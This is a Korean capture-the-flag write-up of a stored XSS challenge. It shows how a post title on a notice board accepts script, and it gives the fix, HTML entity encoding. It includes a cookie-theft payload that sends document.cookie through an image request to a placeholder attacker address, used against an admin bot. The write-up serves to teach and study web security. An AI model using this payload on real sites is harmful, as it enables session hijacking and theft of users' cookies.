[SegFault] (XSS) - XSS 1

[SegFault] (XSS)

XSS 1

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지를 확인해본 결과 XSS 취약점이 발견되지 않았다.

공지사항을 확인해보기로 한다.

글쓰기 기능을 이용하여 글의 제목이나 내용에 스크립트 삽입이 가능한지 확인해본다.

 

XSS Point

< ' " >

위의 특수 기호들에 대하여 확인해보기 위해 제목에 해당 특수문자를 넣어주어 글을 작성해본다.

그 결과 해당 특수문자가 그대로 출력되는 것을 확인할 수 있었다. 그렇다면 스크립트가 삽입 가능하다고 생각하고 다음 단계로 넘어가 본다.

스크립트가 활성화 되는지 확인해보기 위해 다음과 같이 입력하여 확인해본다.

<script>alert(1);</script>

위와 같이 해당 글을 읽기 위해 들어가면 스크립트가 활성화되어 있어 알림창이 뜨는 것을 확인할 수 있었다.

---

풀이 과정 (해결 방안)

그렇다면 쿠키 탈취를 위한 페이로드(Payload)를 작성해보도록 한다.

페이로드(Payload)

<script>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://공격자 주소/?cookie="+cookieData;
</script>

스크립트 삽입

위와 같이 페이로드를 제목에 삽입하여 글을 작성한다.

공격자 주소 = RequestBin 주소

해당 글을 읽기 위해 들어가면 다음과 같이 스크립트가 활성화 되어 제목에는 아무것도 출력되지 않는 것을 확인할 수 있다.

이것을 Burp를 통해 확인해보면 다음과 같다.

해당 페이로드가 삽입된 글을 읽는 페이지를 관리자 Bot 에 보내준다.

탈취된 쿠키(Cookie)가 공격자 주소(RequestBin)으로 받아와지는 것을 확인할 수 있다.

위와 같이 원하는 flag가 쿠키를 통해 획득된 것을 확인하였다.

---

취약점에 관한 고찰

본 문제의 경우 글쓰기의 제목 부분에 스크립트를 삽입할 수 있는 Stored XSS 취약점으로 HTML Entity 가 제대로 적용되지 않아 응답(Response)에서 작성한 제목이 그대로 노출되고 있음을 이용한 취약점이다.

< ' " > 와 같은 특수문자의 경우, HTML 특수코드(HTML Entity)로 치환하여 스크립트 실행에 영향을 줄 수 있는 태그(tag)와 혼용되는 것을 방지하기 위해 문자열로서만 인식되도록 구현해줘야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영